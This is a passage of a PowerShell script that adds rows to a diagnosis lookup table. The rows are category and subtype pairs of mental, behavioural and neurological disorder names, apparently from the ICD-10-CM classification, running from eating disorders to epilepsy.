$DiagnosisList.Rows.Add("Anorexia nervosa","Anorexia nervosa, binge eating/purging type") + $null = $DiagnosisList.Rows.Add("Bulimia nervosa","Bulimia nervosa") + $null = $DiagnosisList.Rows.Add("Other eating disorders","Binge eating disorder") + $null = $DiagnosisList.Rows.Add("Other eating disorders","Avoidant/restrictive food intake disorder") + $null = $DiagnosisList.Rows.Add("Other eating disorders","Other specified eating disorder") + $null = $DiagnosisList.Rows.Add("Eating disorder, unspecified","Eating disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Insomnia not due to a substance or known physiological condition","Primary insomnia") + $null = $DiagnosisList.Rows.Add("Insomnia not due to a substance or known physiological condition","Adjustment insomnia") + $null = $DiagnosisList.Rows.Add("Insomnia not due to a substance or known physiological condition","Paradoxical insomnia") + $null = $DiagnosisList.Rows.Add("Insomnia not due to a substance or known physiological condition","Psychophysiologic insomnia") + $null = $DiagnosisList.Rows.Add("Insomnia not due to a substance or known physiological condition","Insomnia due to other mental disorder") + $null = $DiagnosisList.Rows.Add("Insomnia not due to a substance or known physiological condition","Other insomnia not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Hypersomnia not due to a substance or known physiological condition","Primary hypersomnia") + $null = $DiagnosisList.Rows.Add("Hypersomnia not due to a substance or known physiological condition","Insufficient sleep syndrome") + $null = $DiagnosisList.Rows.Add("Hypersomnia not due to a substance or known physiological condition","Hypersomnia due to other mental disorder") + $null = $DiagnosisList.Rows.Add("Hypersomnia not due to a substance or known physiological condition","Other hypersomnia not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Sleepwalking [somnambulism]","Sleepwalking [somnambulism]") + $null = $DiagnosisList.Rows.Add("Sleep terrors [night terrors]","Sleep terrors [night terrors]") + $null = $DiagnosisList.Rows.Add("Nightmare disorder","Nightmare disorder") + $null = $DiagnosisList.Rows.Add("Other sleep disorders not due to a substance or known physiological condition","Other sleep disorders not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Sleep disorder not due to a substance or known physiological condition, unspecified","Sleep disorder not due to a substance or known physiological condition, unspecified") + $null = $DiagnosisList.Rows.Add("Sexual dysfunction not due to a substance or known physiological condition","Hypoactive sexual desire disorder") + $null = $DiagnosisList.Rows.Add("Sexual dysfunction not due to a substance or known physiological condition","Sexual aversion disorder") + $null = $DiagnosisList.Rows.Add("Sexual arousal disorders","Male erectile disorder") + $null = $DiagnosisList.Rows.Add("Sexual arousal disorders","Female sexual arousal disorder") + $null = $DiagnosisList.Rows.Add("Orgasmic disorder","Female orgasmic disorder") + $null = $DiagnosisList.Rows.Add("Orgasmic disorder","Male orgasmic disorder") + $null = $DiagnosisList.Rows.Add("Premature ejaculation","Premature ejaculation") + $null = $DiagnosisList.Rows.Add("Vaginismus not due to a substance or known physiological condition","Vaginismus not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Dyspareunia not due to a substance or known physiological condition","Dyspareunia not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Other sexual dysfunction not due to a substance or known physiological condition","Other sexual dysfunction not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Unspecified sexual dysfunction not due to a substance or known physiological condition","Unspecified sexual dysfunction not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Puerperal psychosis","Puerperal psychosis") + $null = $DiagnosisList.Rows.Add("Psychological and behavioral factors associated with disorders or diseases classified elsewhere","Psychological and behavioral factors associated with disorders or diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Abuse of non-psychoactive substances","Abuse of antacids") + $null = $DiagnosisList.Rows.Add("Abuse of non-psychoactive substances","Abuse of herbal or folk remedies") + $null = $DiagnosisList.Rows.Add("Abuse of non-psychoactive substances","Abuse of laxatives") + $null = $DiagnosisList.Rows.Add("Abuse of non-psychoactive substances","Abuse of steroids or hormones") + $null = $DiagnosisList.Rows.Add("Abuse of non-psychoactive substances","Abuse of vitamins") + $null = $DiagnosisList.Rows.Add("Abuse of non-psychoactive substances","Abuse of other non-psychoactive substances") + $null = $DiagnosisList.Rows.Add("Unspecified behavioral syndromes associated with physiological disturbances and physical factors","Unspecified behavioral syndromes associated with physiological disturbances and physical factors") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Paranoid personality disorder") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Schizoid personality disorder") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Antisocial personality disorder") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Borderline personality disorder") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Histrionic personality disorder") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Obsessive-compulsive personality disorder") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Avoidant personality disorder") + $null = $DiagnosisList.Rows.Add("Specific personality disorders","Dependent personality disorder") + $null = $DiagnosisList.Rows.Add("Other specific personality disorders","Narcissistic personality disorder") + $null = $DiagnosisList.Rows.Add("Other specific personality disorders","Other specific personality disorders") + $null = $DiagnosisList.Rows.Add("Personality disorder, unspecified","Personality disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Impulse disorders","Pathological gambling") + $null = $DiagnosisList.Rows.Add("Impulse disorders","Pyromania") + $null = $DiagnosisList.Rows.Add("Impulse disorders","Kleptomania") + $null = $DiagnosisList.Rows.Add("Impulse disorders","Trichotillomania") + $null = $DiagnosisList.Rows.Add("Other impulse disorders","Intermittent explosive disorder") + $null = $DiagnosisList.Rows.Add("Other impulse disorders","Other impulse disorders") + $null = $DiagnosisList.Rows.Add("Impulse disorder, unspecified","Impulse disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Gender identity disorders","Transsexualism") + $null = $DiagnosisList.Rows.Add("Gender identity disorders","Dual role transvestism") + $null = $DiagnosisList.Rows.Add("Gender identity disorders","Gender identity disorder of childhood") + $null = $DiagnosisList.Rows.Add("Gender identity disorders","Other gender identity disorders") + $null = $DiagnosisList.Rows.Add("Gender identity disorders","Gender identity disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Paraphilias","Fetishism") + $null = $DiagnosisList.Rows.Add("Paraphilias","Transvestic fetishism") + $null = $DiagnosisList.Rows.Add("Paraphilias","Exhibitionism") + $null = $DiagnosisList.Rows.Add("Paraphilias","Voyeurism") + $null = $DiagnosisList.Rows.Add("Paraphilias","Pedophilia") + $null = $DiagnosisList.Rows.Add("Sadomasochism","Sadomasochism, unspecified") + $null = $DiagnosisList.Rows.Add("Sadomasochism","Sexual masochism") + $null = $DiagnosisList.Rows.Add("Sadomasochism","Sexual sadism") + $null = $DiagnosisList.Rows.Add("Other paraphilias","Frotteurism") + $null = $DiagnosisList.Rows.Add("Other paraphilias","Other paraphilias") + $null = $DiagnosisList.Rows.Add("Paraphilia, unspecified","Paraphilia, unspecified") + $null = $DiagnosisList.Rows.Add("Other sexual disorders","Other sexual disorders") + $null = $DiagnosisList.Rows.Add("Factitious disorder","Factitious disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Factitious disorder","Factitious disorder with predominantly psychological signs and symptoms") + $null = $DiagnosisList.Rows.Add("Factitious disorder","Factitious disorder with predominantly physical signs and symptoms") + $null = $DiagnosisList.Rows.Add("Factitious disorder","Factitious disorder with combined psychological and physical signs and symptoms") + $null = $DiagnosisList.Rows.Add("Other specified disorders of adult personality and behavior","Other specified disorders of adult personality and behavior") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of adult personality and behavior","Unspecified disorder of adult personality and behavior") + $null = $DiagnosisList.Rows.Add("Mild intellectual disabilities","Mild intellectual disabilities") + $null = $DiagnosisList.Rows.Add("Moderate intellectual disabilities","Moderate intellectual disabilities") + $null = $DiagnosisList.Rows.Add("Severe intellectual disabilities","Severe intellectual disabilities") + $null = $DiagnosisList.Rows.Add("Profound intellectual disabilities","Profound intellectual disabilities") + $null = $DiagnosisList.Rows.Add("Other intellectual disabilities","Other intellectual disabilities") + $null = $DiagnosisList.Rows.Add("Unspecified intellectual disabilities","Unspecified intellectual disabilities") + $null = $DiagnosisList.Rows.Add("Specific developmental disorders of speech and language","Phonological disorder") + $null = $DiagnosisList.Rows.Add("Specific developmental disorders of speech and language","Expressive language disorder") + $null = $DiagnosisList.Rows.Add("Specific developmental disorders of speech and language","Mixed receptive-expressive language disorder") + $null = $DiagnosisList.Rows.Add("Specific developmental disorders of speech and language","Speech and language development delay due to hearing loss") + $null = $DiagnosisList.Rows.Add("Other developmental disorders of speech and language","Childhood onset fluency disorder") + $null = $DiagnosisList.Rows.Add("Other developmental disorders of speech and language","Social pragmatic communication disorder") + $null = $DiagnosisList.Rows.Add("Other developmental disorders of speech and language","Other developmental disorders of speech and language") + $null = $DiagnosisList.Rows.Add("Developmental disorder of speech and language, unspecified","Developmental disorder of speech and language, unspecified") + $null = $DiagnosisList.Rows.Add("Specific developmental disorders of scholastic skills","Specific reading disorder") + $null = $DiagnosisList.Rows.Add("Specific developmental disorders of scholastic skills","Mathematics disorder") + $null = $DiagnosisList.Rows.Add("Other developmental disorders of scholastic skills","Disorder of written expression") + $null = $DiagnosisList.Rows.Add("Other developmental disorders of scholastic skills","Other developmental disorders of scholastic skills") + $null = $DiagnosisList.Rows.Add("Developmental disorder of scholastic skills, unspecified","Developmental disorder of scholastic skills, unspecified") + $null = $DiagnosisList.Rows.Add("Specific developmental disorder of motor function","Specific developmental disorder of motor function") + $null = $DiagnosisList.Rows.Add("Pervasive developmental disorders","Autistic disorder") + $null = $DiagnosisList.Rows.Add("Pervasive developmental disorders","Rett's syndrome") + $null = $DiagnosisList.Rows.Add("Pervasive developmental disorders","Other childhood disintegrative disorder") + $null = $DiagnosisList.Rows.Add("Pervasive developmental disorders","Asperger's syndrome") + $null = $DiagnosisList.Rows.Add("Pervasive developmental disorders","Other pervasive developmental disorders") + $null = $DiagnosisList.Rows.Add("Pervasive developmental disorders","Pervasive developmental disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of psychological development","Other disorders of psychological development") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of psychological development","Unspecified disorder of psychological development") + $null = $DiagnosisList.Rows.Add("Attention-deficit hyperactivity disorders","Attention-deficit hyperactivity disorder, predominantly inattentive type") + $null = $DiagnosisList.Rows.Add("Attention-deficit hyperactivity disorders","Attention-deficit hyperactivity disorder, predominantly hyperactive type") + $null = $DiagnosisList.Rows.Add("Attention-deficit hyperactivity disorders","Attention-deficit hyperactivity disorder, combined type") + $null = $DiagnosisList.Rows.Add("Attention-deficit hyperactivity disorders","Attention-deficit hyperactivity disorder, other type") + $null = $DiagnosisList.Rows.Add("Attention-deficit hyperactivity disorders","Attention-deficit hyperactivity disorder, unspecified type") + $null = $DiagnosisList.Rows.Add("Conduct disorders","Conduct disorder confined to family context") + $null = $DiagnosisList.Rows.Add("Conduct disorders","Conduct disorder, childhood-onset type") + $null = $DiagnosisList.Rows.Add("Conduct disorders","Conduct disorder, adolescent-onset type") + $null = $DiagnosisList.Rows.Add("Conduct disorders","Oppositional defiant disorder") + $null = $DiagnosisList.Rows.Add("Conduct disorders","Other conduct disorders") + $null = $DiagnosisList.Rows.Add("Conduct disorders","Conduct disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Emotional disorders with onset specific to childhood","Separation anxiety disorder of childhood") + $null = $DiagnosisList.Rows.Add("Emotional disorders with onset specific to childhood","Other childhood emotional disorders") + $null = $DiagnosisList.Rows.Add("Emotional disorders with onset specific to childhood","Childhood emotional disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of social functioning with onset specific to childhood and adolescence","Selective mutism") + $null = $DiagnosisList.Rows.Add("Disorders of social functioning with onset specific to childhood and adolescence","Reactive attachment disorder of childhood") + $null = $DiagnosisList.Rows.Add("Disorders of social functioning with onset specific to childhood and adolescence","Disinhibited attachment disorder of childhood") + $null = $DiagnosisList.Rows.Add("Disorders of social functioning with onset specific to childhood and adolescence","Other childhood disorders of social functioning") + $null = $DiagnosisList.Rows.Add("Disorders of social functioning with onset specific to childhood and adolescence","Childhood disorder of social functioning, unspecified") + $null = $DiagnosisList.Rows.Add("Tic disorder","Transient tic disorder") + $null = $DiagnosisList.Rows.Add("Tic disorder","Chronic motor or vocal tic disorder") + $null = $DiagnosisList.Rows.Add("Tic disorder","Tourette's disorder") + $null = $DiagnosisList.Rows.Add("Tic disorder","Other tic disorders") + $null = $DiagnosisList.Rows.Add("Tic disorder","Tic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other behavioral and emotional disorders with onset usually occurring in childhood and adolescence","Enuresis not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Other behavioral and emotional disorders with onset usually occurring in childhood and adolescence","Encopresis not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Other feeding disorders of infancy and childhood","Rumination disorder of infancy") + $null = $DiagnosisList.Rows.Add("Other feeding disorders of infancy and childhood","Other feeding disorders of infancy and early childhood") + $null = $DiagnosisList.Rows.Add("Pica of infancy and childhood","Pica of infancy and childhood") + $null = $DiagnosisList.Rows.Add("Stereotyped movement disorders","Stereotyped movement disorders") + $null = $DiagnosisList.Rows.Add("Adult onset fluency disorder","Adult onset fluency disorder") + $null = $DiagnosisList.Rows.Add("Other specified behavioral and emotional disorders with onset usually occurring in childhood and adolescence","Other specified behavioral and emotional disorders with onset usually occurring in childhood and adolescence") + $null = $DiagnosisList.Rows.Add("Unspecified behavioral and emotional disorders with onset usually occurring in childhood and adolescence","Unspecified behavioral and emotional disorders with onset usually occurring in childhood and adolescence") + $null = $DiagnosisList.Rows.Add("Mental disorder, not otherwise specified","Mental disorder, not otherwise specified") + $null = $DiagnosisList.Rows.Add("Bacterial meningitis, not elsewhere classified","Hemophilus meningitis") + $null = $DiagnosisList.Rows.Add("Bacterial meningitis, not elsewhere classified","Pneumococcal meningitis") + $null = $DiagnosisList.Rows.Add("Bacterial meningitis, not elsewhere classified","Streptococcal meningitis") + $null = $DiagnosisList.Rows.Add("Bacterial meningitis, not elsewhere classified","Staphylococcal meningitis") + $null = $DiagnosisList.Rows.Add("Bacterial meningitis, not elsewhere classified","Other bacterial meningitis") + $null = $DiagnosisList.Rows.Add("Bacterial meningitis, not elsewhere classified","Bacterial meningitis, unspecified") + $null = $DiagnosisList.Rows.Add("Meningitis in bacterial diseases classified elsewhere","Meningitis in bacterial diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Meningitis in other infectious and parasitic diseases classified elsewhere","Meningitis in other infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Meningitis due to other and unspecified causes","Nonpyogenic meningitis") + $null = $DiagnosisList.Rows.Add("Meningitis due to other and unspecified causes","Chronic meningitis") + $null = $DiagnosisList.Rows.Add("Meningitis due to other and unspecified causes","Benign recurrent meningitis [Mollaret]") + $null = $DiagnosisList.Rows.Add("Meningitis due to other and unspecified causes","Meningitis due to other specified causes") + $null = $DiagnosisList.Rows.Add("Meningitis due to other and unspecified causes","Meningitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute disseminated encephalitis and encephalomyelitis (ADEM)","Acute disseminated encephalitis and encephalomyelitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute disseminated encephalitis and encephalomyelitis (ADEM)","Postinfectious acute disseminated encephalitis and encephalomyelitis (postinfectious ADEM)") + $null = $DiagnosisList.Rows.Add("Acute disseminated encephalitis and encephalomyelitis (ADEM)","Postimmunization acute disseminated encephalitis, myelitis and encephalomyelitis") + $null = $DiagnosisList.Rows.Add("Tropical spastic paraplegia","Tropical spastic paraplegia") + $null = $DiagnosisList.Rows.Add("Bacterial meningoencephalitis and meningomyelitis, not elsewhere classified","Bacterial meningoencephalitis and meningomyelitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Acute necrotizing hemorrhagic encephalopathy","Acute necrotizing hemorrhagic encephalopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Acute necrotizing hemorrhagic encephalopathy","Postinfectious acute necrotizing hemorrhagic encephalopathy") + $null = $DiagnosisList.Rows.Add("Acute necrotizing hemorrhagic encephalopathy","Postimmunization acute necrotizing hemorrhagic encephalopathy") + $null = $DiagnosisList.Rows.Add("Acute necrotizing hemorrhagic encephalopathy","Other acute necrotizing hemorrhagic encephalopathy") + $null = $DiagnosisList.Rows.Add("Other encephalitis, myelitis and encephalomyelitis","Other encephalitis and encephalomyelitis") + $null = $DiagnosisList.Rows.Add("Other encephalitis, myelitis and encephalomyelitis","Other myelitis") + $null = $DiagnosisList.Rows.Add("Encephalitis, myelitis and encephalomyelitis, unspecified","Encephalitis and encephalomyelitis, unspecified") + $null = $DiagnosisList.Rows.Add("Encephalitis, myelitis and encephalomyelitis, unspecified","Myelitis, unspecified") + $null = $DiagnosisList.Rows.Add("Encephalitis, myelitis and encephalomyelitis in diseases classified elsewhere","Encephalitis and encephalomyelitis in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Encephalitis, myelitis and encephalomyelitis in diseases classified elsewhere","Myelitis in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Intracranial and intraspinal abscess and granuloma","Intracranial abscess and granuloma") + $null = $DiagnosisList.Rows.Add("Intracranial and intraspinal abscess and granuloma","Intraspinal abscess and granuloma") + $null = $DiagnosisList.Rows.Add("Intracranial and intraspinal abscess and granuloma","Extradural and subdural abscess, unspecified") + $null = $DiagnosisList.Rows.Add("Intracranial and intraspinal abscess and granuloma in diseases classified elsewhere","Intracranial and intraspinal abscess and granuloma in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Intracranial and intraspinal phlebitis and thrombophlebitis","Intracranial and intraspinal phlebitis and thrombophlebitis") + $null = $DiagnosisList.Rows.Add("Sequelae of inflammatory diseases of central nervous system","Sequelae of inflammatory diseases of central nervous system") + $null = $DiagnosisList.Rows.Add("Huntington's disease","Huntington's disease") + $null = $DiagnosisList.Rows.Add("Hereditary ataxia","Congenital nonprogressive ataxia") + $null = $DiagnosisList.Rows.Add("Hereditary ataxia","Early-onset cerebellar ataxia") + $null = $DiagnosisList.Rows.Add("Hereditary ataxia","Late-onset cerebellar ataxia") + $null = $DiagnosisList.Rows.Add("Hereditary ataxia","Cerebellar ataxia with defective DNA repair") + $null = $DiagnosisList.Rows.Add("Hereditary ataxia","Hereditary spastic paraplegia") + $null = $DiagnosisList.Rows.Add("Hereditary ataxia","Other hereditary ataxias") + $null = $DiagnosisList.Rows.Add("Hereditary ataxia","Hereditary ataxia, unspecified") + $null = $DiagnosisList.Rows.Add("Spinal muscular atrophy and related syndromes","Infantile spinal muscular atrophy, type I [Werdnig-Hoffman]") + $null = $DiagnosisList.Rows.Add("Spinal muscular atrophy and related syndromes","Other inherited spinal muscular atrophy") + $null = $DiagnosisList.Rows.Add("Motor neuron disease","Motor neuron disease, unspecified") + $null = $DiagnosisList.Rows.Add("Motor neuron disease","Amyotrophic lateral sclerosis") + $null = $DiagnosisList.Rows.Add("Motor neuron disease","Progressive bulbar palsy") + $null = $DiagnosisList.Rows.Add("Motor neuron disease","Primary lateral sclerosis") + $null = $DiagnosisList.Rows.Add("Motor neuron disease","Familial motor neuron disease") + $null = $DiagnosisList.Rows.Add("Motor neuron disease","Progressive spinal muscle atrophy") + $null = $DiagnosisList.Rows.Add("Motor neuron disease","Other motor neuron disease") + $null = $DiagnosisList.Rows.Add("Other spinal muscular atrophies and related syndromes","Other spinal muscular atrophies and related syndromes") + $null = $DiagnosisList.Rows.Add("Spinal muscular atrophy, unspecified","Spinal muscular atrophy, unspecified") + $null = $DiagnosisList.Rows.Add("Systemic atrophies primarily affecting central nervous system in diseases classified elsewhere","Paraneoplastic neuromyopathy and neuropathy") + $null = $DiagnosisList.Rows.Add("Systemic atrophies primarily affecting central nervous system in diseases classified elsewhere","Other systemic atrophy primarily affecting central nervous system in neoplastic disease") + $null = $DiagnosisList.Rows.Add("Systemic atrophies primarily affecting central nervous system in diseases classified elsewhere","Systemic atrophy primarily affecting the central nervous system in myxedema") + $null = $DiagnosisList.Rows.Add("Systemic atrophies primarily affecting central nervous system in diseases classified elsewhere","Systemic atrophy primarily affecting central nervous system in other diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Postpolio syndrome","Postpolio syndrome") + $null = $DiagnosisList.Rows.Add("Parkinson's disease","Parkinson's disease") + $null = $DiagnosisList.Rows.Add("Secondary parkinsonism","Malignant neuroleptic syndrome") + $null = $DiagnosisList.Rows.Add("Other drug-induced secondary parkinsonism","Neuroleptic induced parkinsonism") + $null = $DiagnosisList.Rows.Add("Other drug-induced secondary parkinsonism","Other drug induced secondary parkinsonism") + $null = $DiagnosisList.Rows.Add("Secondary parkinsonism due to other external agents","Secondary parkinsonism due to other external agents") + $null = $DiagnosisList.Rows.Add("Postencephalitic parkinsonism","Postencephalitic parkinsonism") + $null = $DiagnosisList.Rows.Add("Vascular parkinsonism","Vascular parkinsonism") + $null = $DiagnosisList.Rows.Add("Other secondary parkinsonism","Other secondary parkinsonism") + $null = $DiagnosisList.Rows.Add("Secondary parkinsonism, unspecified","Secondary parkinsonism, unspecified") + $null = $DiagnosisList.Rows.Add("Other degenerative diseases of basal ganglia","Hallervorden-Spatz disease") + $null = $DiagnosisList.Rows.Add("Other degenerative diseases of basal ganglia","Progressive supranuclear ophthalmoplegia [Steele-Richardson-Olszewski]") + $null = $DiagnosisList.Rows.Add("Other degenerative diseases of basal ganglia","Striatonigral degeneration") + $null = $DiagnosisList.Rows.Add("Other degenerative diseases of basal ganglia","Other specified degenerative diseases of basal ganglia") + $null = $DiagnosisList.Rows.Add("Other degenerative diseases of basal ganglia","Degenerative disease of basal ganglia, unspecified") + $null = $DiagnosisList.Rows.Add("Drug induced dystonia","Drug induced subacute dyskinesia") + $null = $DiagnosisList.Rows.Add("Drug induced dystonia","Drug induced acute dystonia") + $null = $DiagnosisList.Rows.Add("Drug induced dystonia","Other drug induced dystonia") + $null = $DiagnosisList.Rows.Add("Genetic torsion dystonia","Genetic torsion dystonia") + $null = $DiagnosisList.Rows.Add("Idiopathic nonfamilial dystonia","Idiopathic nonfamilial dystonia") + $null = $DiagnosisList.Rows.Add("Spasmodic torticollis","Spasmodic torticollis") + $null = $DiagnosisList.Rows.Add("Idiopathic orofacial dystonia","Idiopathic orofacial dystonia") + $null = $DiagnosisList.Rows.Add("Blepharospasm","Blepharospasm") + $null = $DiagnosisList.Rows.Add("Other dystonia","Other dystonia") + $null = $DiagnosisList.Rows.Add("Dystonia, unspecified","Dystonia, unspecified") + $null = $DiagnosisList.Rows.Add("Other extrapyramidal and movement disorders","Essential tremor") + $null = $DiagnosisList.Rows.Add("Other extrapyramidal and movement disorders","Drug-induced tremor") + $null = $DiagnosisList.Rows.Add("Other extrapyramidal and movement disorders","Other specified forms of tremor") + $null = $DiagnosisList.Rows.Add("Other extrapyramidal and movement disorders","Myoclonus") + $null = $DiagnosisList.Rows.Add("Other extrapyramidal and movement disorders","Drug-induced chorea") + $null = $DiagnosisList.Rows.Add("Other extrapyramidal and movement disorders","Other chorea") + $null = $DiagnosisList.Rows.Add("Drug induced tics and other tics of organic origin","Drug induced tics") + $null = $DiagnosisList.Rows.Add("Drug induced tics and other tics of organic origin","Other tics of organic origin") + $null = $DiagnosisList.Rows.Add("Other and unspecified drug induced movement disorders","Drug induced movement disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified drug induced movement disorders","Drug induced akathisia") + $null = $DiagnosisList.Rows.Add("Other and unspecified drug induced movement disorders","Other drug induced movement disorders") + $null = $DiagnosisList.Rows.Add("Other specified extrapyramidal and movement disorders","Restless legs syndrome") + $null = $DiagnosisList.Rows.Add("Other specified extrapyramidal and movement disorders","Stiff-man syndrome") + $null = $DiagnosisList.Rows.Add("Other specified extrapyramidal and movement disorders","Benign shuddering attacks") + $null = $DiagnosisList.Rows.Add("Other specified extrapyramidal and movement disorders","Other specified extrapyramidal and movement disorders") + $null = $DiagnosisList.Rows.Add("Extrapyramidal and movement disorder, unspecified","Extrapyramidal and movement disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Extrapyramidal and movement disorders in diseases classified elsewhere","Extrapyramidal and movement disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Alzheimer's disease","Alzheimer's disease with early onset") + $null = $DiagnosisList.Rows.Add("Alzheimer's disease","Alzheimer's disease with late onset") + $null = $DiagnosisList.Rows.Add("Alzheimer's disease","Other Alzheimer's disease") + $null = $DiagnosisList.Rows.Add("Alzheimer's disease","Alzheimer's disease, unspecified") + $null = $DiagnosisList.Rows.Add("Frontotemporal dementia","Pick's disease") + $null = $DiagnosisList.Rows.Add("Frontotemporal dementia","Other frontotemporal dementia") + $null = $DiagnosisList.Rows.Add("Senile degeneration of brain, not elsewhere classified","Senile degeneration of brain, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Degeneration of nervous system due to alcohol","Degeneration of nervous system due to alcohol") + $null = $DiagnosisList.Rows.Add("Other specified degenerative diseases of nervous system","Alpers disease") + $null = $DiagnosisList.Rows.Add("Other specified degenerative diseases of nervous system","Leigh's disease") + $null = $DiagnosisList.Rows.Add("Other specified degenerative diseases of nervous system","Dementia with Lewy bodies") + $null = $DiagnosisList.Rows.Add("Other specified degenerative diseases of nervous system","Mild cognitive impairment, so stated") + $null = $DiagnosisList.Rows.Add("Other specified degenerative diseases of nervous system","Corticobasal degeneration") + $null = $DiagnosisList.Rows.Add("Other specified degenerative diseases of nervous system","Other specified degenerative diseases of nervous system") + $null = $DiagnosisList.Rows.Add("Degenerative disease of nervous system, unspecified","Degenerative disease of nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Other degenerative disorders of nervous system in diseases classified elsewhere","Subacute combined degeneration of spinal cord in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified degenerative disorders of nervous system in diseases classified elsewhere","Cerebellar ataxia in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified degenerative disorders of nervous system in diseases classified elsewhere","Other specified degenerative disorders of nervous system in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Multiple sclerosis","Multiple sclerosis") + $null = $DiagnosisList.Rows.Add("Other acute disseminated demyelination","Neuromyelitis optica [Devic]") + $null = $DiagnosisList.Rows.Add("Other acute disseminated demyelination","Acute and subacute hemorrhagic leukoencephalitis [Hurst]") + $null = $DiagnosisList.Rows.Add("Other acute disseminated demyelination","Other specified acute disseminated demyelination") + $null = $DiagnosisList.Rows.Add("Other acute disseminated demyelination","Acute disseminated demyelination, unspecified") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Diffuse sclerosis of central nervous system") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Central demyelination of corpus callosum") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Central pontine myelinolysis") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Acute transverse myelitis in demyelinating disease of central nervous system") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Subacute necrotizing myelitis of central nervous system") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Concentric sclerosis [Balo] of central nervous system") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Other specified demyelinating diseases of central nervous system") + $null = $DiagnosisList.Rows.Add("Other demyelinating diseases of central nervous system","Demyelinating disease of central nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, not intractable","Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, not intractable","Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, intractable","Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, intractable","Localization-related (focal) (partial) idiopathic epilepsy and epileptic syndromes with seizures of localized onset, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, not intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, not intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with simple partial seizures, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, not intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, not intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, not intractable, without status epilepticus") + 